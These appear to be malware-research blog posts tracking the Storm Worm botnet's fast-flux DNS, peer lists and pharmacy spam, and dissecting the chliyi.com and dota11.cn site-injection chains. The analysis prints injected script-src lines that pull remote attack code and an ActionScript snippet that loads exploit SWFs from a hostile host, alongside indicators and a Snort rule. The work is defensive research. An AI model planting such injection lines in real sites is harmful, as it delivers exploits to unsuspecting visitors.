It looks like the Storm worm authors have finally got their DNS issues worked out and have started repairing the overall botnet structure. I wonder how much money is lost when a spam sending botnet the size of the Storm Worm is down for longer than a few days? I would bet it is a lot. Anyways it looks like the Storm Worm Web servers do not have an index page defined yet, but I bet that this configuration is short lived. I was only able to grab these files or pages from a Storm Worm server during my testing: ind.php, load.php, sony.exe, loveyou.exe, and iloveyou.exe. The iloveyou.exe and loveyou.exe are identical binaries with the same md5sums, and here is there VirusTotal results. The load.php and sony.exe are also identical binaries, and here is there VirusTotal results. According to the VirusTotal statistics it looks like about 50% of the Antivirus companies are detecting these binaries at this time. Running these binaries in my sandnet shows they are still using the herjek.exe and herjek.config file names and are located in the Windows directory (%windir%). Here is a list of the 815 peers I was able to extract: peers_list.txt.

Some of the more interesting findings in my tests this afternoon had to do with the spam the Storm Worm was trying to send out. All of the spam being sent out right now is using subdomain names for only a few unique domain names. The following are the unique domain names I was able to extract from my sandnet SMTP mail server:

• catsharp.com
• lowsmell.com
• picturewest.com
• posestory.com
• pressrose.com
• producemorning.com

Here are a few of the subdomain names I saw:

• aayxyi.catsharp.com
• acknl.pressrose.com
• acz.picturewest.com
• ad.producemorning.com
• adru.picturewest.com
• aegi.lowsmell.com
• aegirl.pressrose.com
• aemw.picturewest.com
• afpirl.picturewest.com

A full list of these subdomain names I was able to identify can be found here: smtp_sites subdomains. Obviously these subdomains are randomly generated and the Storm DNS servers have wildcards to accept requests for any subdomain for the few domain names I provided earlier. All of these domains and subdomains seem to point you to the Canadian Pharmacy site I spoke about in my last Storm Worm posting. This time though it looks like even the SPAM domains are using Fast Flux technology to rotate their IP addresses from a list of 20 IPs that are also rotated about every two minutes. This will definitely prevent IP blocks from being affective, so if you have any type of DNS blackholing or blacklists I would suggest you add these domains to those lists now. All of the SPAM was focused on Pharmaceuticals, which is fairly normal for the Storm Worm. Here is a list of the unique subject lines I saw in my sandnet: smtp_subjects.txt.

One last note of interest for everyone that emailed me about the Storm Binary Tracker being down. My outage was due to the Storm Worm having intermediate issues, but since these issues are over my Storm Binary Tracker is now back up and running. Happy Malware Hunting!

According to my Google searching chliyi.com has successfully been injected onto about ~12,000 sites. This malicious domain is using the well publicized Adobe Flash vulnerability along with a few others. The good news is Symantec Threatcon has retracted their declaration of this being a 0-day exploit, and have since clarified with the help of Adobe this exploit does not work on the newest version of the Flash Player version 9.0.124.0. This site is not very complex in structure, as the following site map demonstrates:

As you can see the entry page for this injection is chliyi.com/reg.js using the following code

<script src=hxxp://www.chliyi.com/reg.js>

hxxp://www.chliyi.com/reg.js

This file contains no obfustication, but does contain some interesting logic as you can see.

Obviously if you are using the Chinese language pack you won't receive any of the malicious code, so I would assume the Authors want to avoid exploiting Chinese clients. With that I also believe that this round of injections was most likely performed be a Chinese organization.

hxxp://www.chliyi.com/img/info.htm

This page is where the obfustication starts. This also starts the decision tree for choosing which exploits to serve to a user being directed to this malicious domain. The first obfustication is done with VBScript and looks like this:

My first deobfustication revealed even more VBScript obfustication and can be seen here:

After the second deobfustication we see the first portion of the decision tree in choosing which exploits to send to the users computer. The first test tries to create an Adobe.Stream object with the clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 classid, which would identify a browser that is possibly susceptible to the MS06-014 vulnerability. If the creation is successfully the next page that the user is directed to is the help.htm page, and if it is unsuccessfully created the user will be sent over to a serious of exploits to include the highly publicized Flash Player exploit.

hxxp://www.chliyi.com/img/help.htm

The help.htm file is obfusticated with VBScript as well, but defiantly not as complicated. The obfusticated page looked like this:

Deobfusticated it is very clear what vulnerability the Authors are targeting. The MS06-014 vulnerability is an older vulnerability, but it must still have a very good success rate as lots of malicious code is still targeting it. It was only last month that the famous Mpack tool kit stopped including it, so as everyone has said before me keep you systems patched to avoid old vulnerabilities like this one from being exploited on your systems.

If the exploit is successful the user will download hxxp://www.jj120.net/inc/fuckjp.exe binary. VirusTotal results for this are fair with 22/32 (68.75%) which can be seen here: VirusTotal Results. Running this Trojan in my lab it grabbed two more files: FLoader.exe and WLoader.exe, which from my analysis are World of Warcraft account credential stealer's. Their respective VirusTotal results can be found here: FLoader Results and WLoader.exe Results. Obviously the gaming industry offers something valuable for the site authors. Here lately I have started to see a lot more of these types of Trojans, where specific account information is being stolen for gaming sites instead of the normal email and bank info stealer's.

hxxp://www.chliyi.com/img/flash.swf

This is obviously the Flash player exploit getting so much attention in the last few days. Most of the other sites using this exploit are embedding an Action Script that will actually direct you to load different Flash files using exploits based off your browser. For example most sites will separate the Firefox file from the IE file being used, but this one is not as sophisticated and serves only one flash media file. The flash decompile looks like this using swfdump:

A code extraction attempt using flare showed this:

I am fairly new at deobfusticating Flash files, but what I did notice is there is no action script associated with the exploit. You can read the security bulletin posted by Adobe for more information, and if you happen to run across the toolkit or actual exploit documentation feel free to send it my way. Also here are the VirusTotal results for Flash.swf.

hxxp://www.chliyi.com/img/real.htm

This is another VBScript obfusticated page, but this time targeting the Real Player (CVE-2007-5601) vulnerability. This is just another example of why system administrators need to pay attention to software updates outside the normal Microsoft Windows and Microsoft Office updates being published once a month. The deobfustication process took two VBScript deobfustications to display the actual JavaScript rendered exploit seen here:

I didn't include the obfusticated code snapshots as they were actually very large files with to many lines to try and take screen shots that would display properly in this post. If you need them I can send them your way or post them up for download, just ask.

hxxp://www.chliyi.com/img/new.htm

The new.htm file is another attempt at exploiting a known vulnerability in Real Player (CVE-2008-1309). This deobfustication took 2 VBScript decodes to render the following code:

Obviously none of these exploits being severed up by this malicious domain are 0-day's, so if you will just keep your systems up to date and exercise alittle bit of caution when surfing the internet you should be ok. One obvious plugin I would highly recommend is the NoScript plugin for Firefox, as it will definitely aid in stopping these scripts from executing without your permission. I would also suggest the filtering of the domain names seen in this analysis chliyi.com and jj120.net at the very minimum if you have that capability. Another option would be to block the IPs associated with these domain chliyi.com (218.30.96.87) and jj120.net (61.142.250.221), this sometimes leads to legitimate sites being blocked as they could be on a shared host. I checked all the A and CNAME records associated with those IPs and didn't see anything that looked legitimate or popular. I would rather block now and apologize later, but this is definitely not the corporate standard.

I also wasn't surprised at all to see who the registrars for these two hostile domains were as they seem to be very popular with the Malware writing community lately.

Domain Name: CHLIYI.COM
Registrar: BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
Whois Server: whois.dns.com.cn
Referral URL: http://www.dns.com.cn
Name Server: DNS21.HICHINA.COM
Name Server: DNS22.HICHINA.COM
Status: ok
Updated Date: 24-jan-2008
Creation Date: 12-jun-2003
Expiration Date: 12-jun-2008

Domain Name: JJ120.NET
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.72DNS.COM
Name Server: NS2.72DNS.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 09-mar-2008
Creation Date: 07-mar-2006
Expiration Date: 07-mar-2009

As always if you have any questions or comments feel free to contact me or leave them here.

SQL and XSS site injections have become a standard for spreading malicious code and binaries lately. This is my analysis of the dota11.cn injection that just recently occurred. My goal in doing this analysis is to provide a visual picture into how these types of injections work and the methodologies behind them. First off here is a Site Map for the current mappings of the dota11.cn injection:

As you can see from the Site Map these types of injections server as the gateways to a much larger schema of user tracking, malicious code, and exploit serving web pages and/or scripts. Now let me attempt to walk you through the logic for this schema.

hxxp://www.dota11.cn/m.js

This is the entry page for this injection. The following is the actual code injected into a vulnerable web site:

<script src=hxxp://www.dota11.cn/m.js>

A simple script src= will automatically include the malicious code from the above URL, which is why it is injected into the vulnerable web site in the first place. The m.js file contains a simple JavaScript that is used to non intrusively redirect you to a statistics gathering server. This will allow the malicious designer of this schema to track users, system configurations, and traffic flows as you are involuntarily redirected through this maze of hostile content. The statistical gathering server is located here: web.51.la/go.asp. The other portion of the m.js file contains simple logic to rendor one of two iframe redirections based off your browsers language settings. If you have the Chinese language back configured you will be directed to: windows.loveyoushipin.com/ing/le.htm, and if you don't have it configured you will be directed to: www.dota11.cn/dj.htm. The last and final portion of the m.js script will direct you via an iframe to: www.woai117.cn/123.htm. You can view the original m.js source code here in PDF format: M.js Source Code.

hxxp://windows.loveyoushipin.com/ing/le.htm

You will only receive this iframe redirection if your browser is configured to use the Chinese Language pack. The le.htm file will attempt to server a Real Player exploit (CVE-2007-5601) to you and more information on this vulnerability can be found here: Vulnerability Summary CVE-2007-5601. The other portion of this script will covertly redirect you to a short JavaScript at hxxp://js.users.51.la/1662569.js, which is the configuration gathering script that will submit your information to the statistics gather web server: vip2.51.la/go.asp. Strategically placing these statistic gathering scripts allows the malicious site designer to track their logic flows and exploit attempts to gauge how successful his or her design is. You can view the original le.htm and 1662569.js source sode here in PDF format: 1662569_js. Source Code and le_htm Source Code

hxxp://www.dota11.cn/dj.htm

You will receive this iframe redirection if your browser is not configured to use the Chinese Language pack. This file appears to be the most complex piece to this malicious schema with several logically choosen exploits being severed up and is obfusticated to prevent detection and deter analysis. The first attempt at serving up malicious content is targeted at an old vulnerability in the Microsoft Data Access Components (MDAC) Function (MS06-014). If your configuration doesn't throw an error on the creation of the Adobe.Stream object you will be iframed redirected to hxxp://www.dota11.cn/14.htm, where the malicious binary bak.exe will be downloaded to your computer from hxxp://www.woai117.cn/bak.exe via the MDAC vulnerability being exploited. If your configuration throws an error a Real Player vulnerability will be probed for. Here is the vulnerability summary information: CVE-2007-5601 and is the same vulnerability that was seen in the le.htm file earlier. If this probe does not throw an error you will be redirected to xxp://www.dota11.cn/rl.htm, where this vulnerability will be attempted to be exploited. If the above Real Player vulnerability probe fails and throws an error you will be iframe redirected to hxxp://www.dota11.cn/new.htm, where you will receive another attempt at exploiting a more recent Real Player vulnerabilty (CVE-2008-1309). You will also be redirected to hxxp://www.dota11.cn/04.htm which looks like a left behind iframe refrence that the designer forgot to clean up. I say this because I recieved a 404 error when I tryed grabbing this file. The last iframe redirection occurs no matter what the above logic dictated and will lead you to hxxp://www.dota11.cn/123.htm. Here is the source code for the files mentioned in this paragraph: dj_htm Source Code, 14_htm Source Code, rl_htm Source Code, and new_htm Source Code. The decoded version of dj.htm can be seen here: dj_htm_decoded Source Code. VirusTotal bak.exe Results.

hxxp://www.dota11.cn/123.htm and hxxp://www.woai117.cn/123.htm

These two files although hosted on separate domains contain the exact same content. Both of these are serving up malicious Flash Media files. If your using Internet Explorer you will receive this video: hxxp://www.woai117.cn/4561.swf and for all others you will receive this video: hxxp://www.woai117.cn/4562.swf. Both of these utilize some embedded Action Script logic to redirect you to a malicious Flash Media file based off your Flash media player version. For Internet Explorer users the redirect looks like this: hxxp://www.woai117.cn/ + fVersion + i.swf and for all others it looks like this: hxxp://www.woai117.cn/ + fVersion + f.swf. The following exert is from the Action Script being used:

movie '4561.swf' {
// flash 8, total frames: 1, frame rate: 12 fps, 550x400 px, compressed
frame 1 {
var fVersion = /:$version;
loadMovie('hxxp://www.woai117.cn/' + fVersion + 'i.swf', _root);
stop();
}
}

This looks like the same vulnerabilities SANS.org is referencing Adobe Flash Player Vuln and Malicious swf files.

If you have any questions or comments regarding this posting as always feel free to contact me. I hope you enjoyed the change from the normal Storm Worm coverage. Thanks for visiting.

Currently the Storm Worm domain name servers are not responding to DNS quires for the known Storm Worm Domain names. The Fast Flux DNS magic the Storm Worm utilizes has been one of the key factors in it's past success, so I would think this is a short lived outage. Currently all of the live Storm Worm domain names I am aware of are pointing to the following DNS servers:

• ns.likenewvideos.com
• ns2.likenewvideos.com
• ns3.likenewvideos.com
• ns4.likenewvideos.com

The oddity of this outage is that the above name servers are rotating their A records with no issues, but none of them have any A records to serve up for the Storm Worm Web Servers. Here are a few examples of my dig query outputs:

;; ANSWER SECTION:
ns.likenewvideos.com. 70381 IN A 76.174.44.224

;; AUTHORITY SECTION:
likenewvideos.com. 70381 IN NS ns4.likenewvideos.com.
likenewvideos.com. 70381 IN NS ns.likenewvideos.com.
likenewvideos.com. 70381 IN NS ns2.likenewvideos.com.
likenewvideos.com. 70381 IN NS ns3.likenewvideos.com.

;; ADDITIONAL SECTION:
ns2.likenewvideos.com. 70381 IN A 209.159.249.102
ns3.likenewvideos.com. 70381 IN A 117.123.100.162
ns4.likenewvideos.com. 70381 IN A 213.211.109.179

;; ANSWER SECTION:
ns2.likenewvideos.com. 150897 IN A 76.90.237.129

;; AUTHORITY SECTION:
likenewvideos.com. 150897 IN NS ns4.likenewvideos.com.
likenewvideos.com. 150897 IN NS ns.likenewvideos.com.
likenewvideos.com. 150897 IN NS ns2.likenewvideos.com.
likenewvideos.com. 150897 IN NS ns3.likenewvideos.com.

;; ADDITIONAL SECTION:
ns.likenewvideos.com. 150897 IN A 69.249.236.201
ns3.likenewvideos.com. 150897 IN A 70.121.44.74
ns4.likenewvideos.com. 150897 IN A 209.159.249.102

;; AUTHORITY SECTION:
likenewvideos.com. 70125 IN NS ns2.likenewvideos.com.
likenewvideos.com. 70125 IN NS ns3.likenewvideos.com.
likenewvideos.com. 70125 IN NS ns4.likenewvideos.com.
likenewvideos.com. 70125 IN NS ns.likenewvideos.com.

;; ADDITIONAL SECTION:
ns.likenewvideos.com. 70125 IN A 76.174.44.224
ns2.likenewvideos.com. 70125 IN A 209.159.249.102
ns4.likenewvideos.com. 70125 IN A 213.211.109.179

;; ANSWER SECTION:
ns4.likenewvideos.com. 150781 IN A 209.159.249.102

;; AUTHORITY SECTION:
likenewvideos.com. 150781 IN NS ns3.likenewvideos.com.
likenewvideos.com. 150781 IN NS ns4.likenewvideos.com.
likenewvideos.com. 150781 IN NS ns.likenewvideos.com.
likenewvideos.com. 150781 IN NS ns2.likenewvideos.com.

;; ADDITIONAL SECTION:
ns.likenewvideos.com. 150781 IN A 69.249.236.201
ns2.likenewvideos.com. 150781 IN A 76.90.237.129
ns3.likenewvideos.com. 150781 IN A 70.121.44.74

It also looks like an outage has also surfaced in the Storm Spam being sent out. I ran a sample for over 3 hours in my sandnet with not one single SMTP packet being sent out, so the good news is this outage may eliminate a few spam messages in my inbox tomorrow morning.

It also looks like my p2p list in the herjek.config file is shrinking slowly, with only 778 IPs in it right now. Here is the decoded herjek.config peer list: Storm Peer IP List.

I don't really think this outage will last longer than 24 hours, and would be surprised if it is still occurring when I get up in the morning. This is more than likely down time for an update, or maybe even some type of configuration changes being conducted by the Storm Worm Authors. Look for something new from them real soon!

UPDATE: I am now starting to see the Storm Worm DNS servers and Web servers recover, but it now seems as if the entire Storm Worm network is now experiencing intermediate availability.  Again, I don't believe this is something permanent, and is more than likely intermediate outages as the Storm Worm Authors get their updates and/or changes out.

In the last 24 to 48 hours I have seen a tremendous slow down in the number of Storm Worm web server IPs being rotated through the Fast Flux network. I usually average about 8,000 to 10,000 unique IPs a day using some custom scripts to query the Storm Worm DNS servers, but for the last 24 hours I have only seen 223 unique IPs. I am not sure why this has occurred, and it may just be a hiccup that has unintentionally occurred. Although in the past when I have identified hiccups in the Storm network it has always been on the eve of a change. This may very well be indicator change is on the horizon, since this is Memorial Day weekend here in the United States. Here is a list of the 223 Storm Web Serving IPs I have seen in the last 24 hours: Storm Web Server Unique IPs.

Since I saw this tremendous reduction in Storm Web Servers I figured I would check to see if there was any reductions in the number of peers currently stored in the herjek.config file. Although this is not a good overall indicator of how many bots are in the Storm Worm network, I still thought I would check. I did not see any obvious reductions with 850 IPs being maintained in my sandnet run for a little over an hour. Here is a list of the peers from this run: Storm Peer List.

I have just recently started looking deeper into the Spam sent out by the Storm Worm and I have identified a few interesting characteristics. I captured a total of 2,524 Spam messages during the same one hour sandnet run I mentioned earlier in this posting. Out of the 2,524 Spam messages there were exactly 853 unique Subject lines all pertaining to pharmaceuticals, mostly focused on male enhancements and Viagra. Here is a file with all of the unique subject lines I saw: Storm SMTP Subject Lines. Another interesting observation is out of all these Spam Messages there were only 9 different domain names being advertised within the spam messages. These domain names were:

1. catsharp.com
2. followequate.com
3. industrydictionary.com
4. lowsmell.com
5. picturewest.com
6. posestory.com
7. pressrose.com
8. printlength.com
9. producemorning.com

All of which resolved to IP address 220.162.247.222, which seems to be a Canadian Pharmacy website advertised as the #1 online drug store. In their FAQ's they claim that all physicians are US licensed using only board certified physicians and U.S licensed pharmacies. They also state all of their products are manufactured and shipped from India and approved by INDIAN FDA for export. I got a real laugh when I saw this Canadian Pharmaceutical company actually advertising an Anti-Spam policy. Here are a few direct quotes from this policy:

Canadian Pharmacy supports ONLY permission-based email management practices. In this regard, Canadian Pharmacy has implemented various policies and procedures that:

• Help prevent Canadian Pharmacy from being used for the purpose of unsolicited email campaigns.
• Encourage permission-based marketing.
• Respond to all complaints suggesting Canadian Pharmacy has been used as a vehicle to send unsolicited email.

You may not use the Canadian Pharmacy or the products or services provided through or in connection with the Canadian Pharmacy to: a. send unsolicited bulk email, for commercial or non-commercial purposes. Unsolicited bulk email is defined as email sent to more than 10 individuals without their permission."

Canadian Pharmacy takes permission marketing very seriously. Thank you for reviewing our Anti-Spam Policy.

Another interesting pun available on this site is there privacy policy. Here are a few of the humerus lines I found in this policy:

Use of Your Email Information
Canadian Pharmacy is not an email list rental service and does not rent or sell any email addresses or other contact information that you provide.

E-mail and Direct Response Contact
All of our direct response methods are opt-in. If you subscribed to our e-mail newsletter(s) but do not want to receive it in the future, please follow the "unsubscribe" instructions contained in the newsletter(s)

Well that is odd, as I seemed to have just parsed through a few thousand Spam messages generated from the Storm Bot that all pointed to them. I guess policies like these help them seem like a more legit website/company that is actively taking action against unsolicited spam. Just to see what would happen I went ahead and posted a message in their contact us form. I guess they don't appreciative spam either, as they are employing captcha to limit the comment spam bots. They also publish the following email address as their customer support email address: support@canadianmedicationsupport.com. To bad there are no MX or A records being advertised for this domain, so emails will definitely have a difficult time getting to them.

Using passive DNS discovery techniques I was able to identify a few more IP addresses and Domain Names associated with this devious pharmaceutical supplier:

methodproduce.com A 220.162.247.222
pressrose.com A 220.162.247.222
followequate.com A 220.162.247.222
producemorning.com A 220.162.247.222
printlength.com A 220.162.247.222
lowsmell.com A 220.162.247.222
ns3.adverdomain.com A 220.162.247.222
catsharp.com A 220.162.247.222
gladcoat.com A 220.162.247.222
wyd.gladcoat.com A 220.162.247.222
picturewest.com A 220.162.247.222
industrydictionary.com A 220.162.247.222
posestory.com A 220.162.247.222
viagrabest.info A 220.162.247.222
www.viagrabest.info CNAME viagrabest.info

catsharp.com A 61.253.105.133
catsharp.com A 79.135.167.4
catsharp.com A 116.123.47.80
catsharp.com A 220.162.247.222
catsharp.com NS ns2.xinnet.cn
catsharp.com NS ns.xinnet.cn
catsharp.com NS ns1.qw22.com
catsharp.com NS ns2.qw22.com
catsharp.com NS ns3.qw22.com
catsharp.com NS ns4.qw22.com
catsharp.com NS ns2.xinnetdns.com
catsharp.com NS ns.xinnetdns.com

Looks like they have been doing this for sometime now based off all of the IPs and Domain Names listed in the queries. I also noticed that all off these IPs seem to be using Virtual Host configurations, as visiting these sites strictly by IP will get you interesting messages like "It works!" and squid proxy messages. All of these sites are severed by Ngnix web servers. Ngnix web servers seem to be a popular choice for phishing sites, malware serving sites, and now pharmaceutical sites. I should also note the Storm Worm binary serving web servers use this same web server. I won't bore you with whois query results, but I did find it interesting "Wen Fang" seems to be the registrant for all of the domain names being used, along with a few hundred other domain names.

As always if you have any questions or comments regarding this information feel free to contact me anytime and have a nice Memorial Day Weekend!

Looks like the Storm Worm authors are back to using good old fashion Social Engineering to infect unsuspecting users. Obviously this is nothing new for the Storm Worm, but for the last few weeks they have relied solely on iframe redirections combined with fancy JavaScript obfustication serving up multiple exploits. My assumption would be this new wave of Social Engineering is a result of the Storm Worm Botnet shrinking in size everyday.

The new web page is simple and to the point with only the following message being displayed:

Your download should start automatically in a few seconds. If not, click here to start the download.

The page source code looks like this:

As you can see there are two binaries being offered up by this page: "loveyou.exe" and "iloveyou.exe". If you click to the hyperlink on this page you will download the "loveyou.exe" binary. If you just wait 5 seconds you will automatically download the "iloveyou.exe" binary via a meta tag refresh. This is of course very simple code in comparison to the "ind.php" JavaScript obfusticated page, which might I add is still being offered up with multiple exploits to anyone visiting this page.

This particular version of the Storm Worm creates a configuration file of peers in the %WINDIR% titled: "totacon.config" and the actual Storm Worm Binary file titled: "totacon.exe". VirusTotal results at the time of this analysis were not very promising (6/32), and can be found here: VirusTotal results for iloveyou.exe and VirusTotal results for totacon.exe. Microsoft does seem to be on top of this, so they get an AT-A-BOY from me. Just for the fun of it I also ran the "iloveyou.exe" through the ThreatExpert Sandbox and ended up with these results: ThreatExpert Report iloveyou.exe.

I have decided to post a few of my results from my personal sandbox analysis conducted in my make shift lab. First off here is a list of the 804 IPs I was able to extract from the "totacon.config" file: Totacon Config Storm Peers with my storm_config_decoder.pl script. I also decided to grab some SMTP traffic by modifying Joe Stewart's Truman fauxsmtp.pl script combined with my Perl DNS script to safely collect the spam without my ISP going nuts, and also running the risk of getting blacklisted. Here is that log file for your viewing pleasure: Storm Worm SMTP Log file. As you can see the Storm Worm SPAM mails focus heavily on male enhancement pharmaceuticals, no surprise here. On a positive side note all of the http references for this SPAM run instance are blank. I believe this is because the current Storm Worm Domain Names being utilized have had there A records removed, possibly because the Registrant may have taken action against them. Thanks Mark from http://spamtrackers.eu for this information, as I was initially caught a little off guard by my logs till I saw your comments.

I also went ahead and decrypted some of the Edonkey p2p traffic as a quick check to see if the "XOR" key had changed, but it had not. Here is a portion of the decrypted pcap for anyone that is curious to actually see what the Storm Worm p2p Botnet traffic looks like: Decrypted Storm Worm PCAP and just for comparison here is the same pcap slice encrypted in it's original form: Storm Worm Traffic Encrypted. Note you will need to utilize an Edonkey decoder to correctly decode the Edonkey protocol, such as the one built into Wireshark. In Wireshark it as simple as opening the file clicking the "Analyze" menu option, and then selecting the "Decode As" menu option from the drop down. From here scroll down and select the Edonkey protocol using the SRC UDP port (24571) in this instance, and finally press the "OK" button. You should see several "Publicize" messages under the info column now, which means you have succeeded at decoding the Edonkey protocol.

As always if you have any questions or comments feel free to shoot them my way. One last thing, I would like to go ahead and thank the professionals and guru's over at UploadMalware.com and MalwareDomainList.com as many of them have activity collaborated and shared insightful information with me on this subject since I became a member on a daily basis. Your help is greatly appreciated!

UPDATE: I reported that the following Storm Worm Domain Names were no longer active: polkerdesign.cn, tellicolakerealty.cn, and cadeaux-avenue.cn.  This information was inaccurate as it was only the Storm Worm Name Servers that were taken action against, causing my queries to fail.  The following Name Servers no longer resolve Storm Worm Domain Names as connections seem to be refused: ns.orthelike.com, ns2.orthelike.com, ns3.orthelike.com, and ns4.orthelike.com.

The Storm Authors are starting to experiment with new and creative ways to ensure we can't track them easily with their latest variant released earlier today. This recent change is actually fairly simple, but at the same time fairly affective in that only the stage one binary "load.php" (Storm's Trojan Downloader) can grab the second stage binary "load2.php", which is the actual Storm Worm binary. They do this by filtering on User Agents. The Storm Trojan downloader's User Agent is "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1921)". Notice the "SV1921" portion as it seems to be the only unique portion that separates this User Agent from the normal Internet Explorer 6 User Agent. To be more specific, the actual Storm Worm binary can only be downloaded with an application using "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1921)" as it's User Agent at this time. I tried several other common IE User Agents, and multiple comibations/variants of the Storm Trojan Downloader User Agent and was unsuccessful at retrieving the binary. With that information I think it would be safe to create a Snort IDS signature looking just for this specific User Agent. I have submitted my finding over to Matt Jonkman at Emerging Threats to get his expert opinion on this. My suggestion would be an update of sid:2008077 to look like this:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Possible Storm Worm EXE Request (Trojan Downloader User Agent)"; flow:established,to_server; content:"|0d 0a|User-Agent\: Mozilla/4.0 (compatible\; MSIE 6.0\; Windows NT 5.1\; SV1921)|0d 0a|"; classtype:trojan-activity; reference:url,www.sudosecure.net/archives/67; sid:2008077; rev:6;)

During the analysis of this variant I also discovered a new Storm Worm Fast Flux domain name: "polkerdesign.cn". The other domain names I was tracking: "apartment-mall.cn, stateandfed.cn, centerprop.cn, and phillipsdminc.cn" have all been shut down, which is good news.

It also looks like Antivirus companies are still behind in getting good signatures out to detect these new variants. My VirusTotal results for "load.php" (38.71%) and my VirusTotal results for "load2.php" (35.48%). In closing, here is a fresh list of the 908 peering IP addresses I extracted from the configuration file "herjek.config": herjek_peers.

As always if you have any questions or comments feel free to contact me.

UPDATE: There was a typo in my initial post leaving out the "Windows NT 5.1" portion, I have corrected this inline, thanks to Levi of his comments.

Looks like my hunches yesterday about the Storm Worm authors being up to something was right on target. One of the researches over at UploadMalware.com discovered the Storm Worm authors spawned a new variant yesterday. This new campaign is solely based off of iframe injections, so far. Maybe in the coming days or hours this will change and we will see some type of enticing download campaign we have grown so fawned off. I would not rule it out as the Storm Worm authors have used the social engineering factor very successfully for over a year now, and I don't see that going away anytime soon.

Alrighty then let me get to some of the juicy stuff about this new campaign. We now have three active Storm Fast Flux domain names serving up obfusticated JavaScript via a PHP file titled "ind.php". The thing that completely threw me off yesterday was they are filtering the exploit with a User Agent check. If you try to grab the "ind.php" with a non exploitable browser or command you will receive a blank page. Here is a PDF of the current "ind.php" file and it's deobfusticated code: ind.php analysis. As you can see in the PDF you will be hit with multiple exploits and if any of them are successful you will be receiving the Storm Worm binary downloader from another PHP file titled: "load.php". Detection is very limited for this new variant downloader: VirusTotal Results for load.php. This downloader will then grab the file "load.exe" which is the actual Storm Worm binary and detection for this is low as well: VirusTotal Results for load.exe.

The new binary drops itself into the Windows directory (%windir%) during installation and is titled: "libor.exe" along with it's new peer file titled: "gogora.config". Just for the heck of it here is a list of the 903 peers I extracted from the config file: peers.

The three currently active domain names are "stateandfed.cn, apartment-mall.cn and centerprop.cn" and it would be advisable to anyone with DNS blackholing or content filtering devices to put them in your configurations now. I am sure we will see a lot more of this via SPAM with links to new blogspot web pages with the iframe redirections embedded in them on Monday morning.

Also as a side note with the authors changing the web page I am having issues with my Storm Binary tracker. I should have them worked out shortly and the database will get updated as soon as I do. If you have any questions or comments feel free to shoot them my way.

It appears that earlier this morning around 9am CST time the Storm Worm web servers pulled the StormCodec.exe, and StormCodec8.exe binaries. I am not sure what is actually occuring as of yet, but my guess is this is preparation for a new download campaign that will begin shortly. If I had to guess, I would guess that the next download campaign would be "Happy Mother's Day" and I would prepare for a fresh set of Spam messages arriving Monday morning.

Another guess would be this is the beginning of the end for the Storm Worm with everyone claiming victory over this menace. I wouldn't bet on that though, as the p2p net is still active (not as large as it use to be) and the Storm Worm's Name Servers are still up and functioning. The only thing that has drastically changed based off my initial investigation this morning is the web servers are not currently serving up the binaries at this time or an index page. If I discover anything new I will let you all know.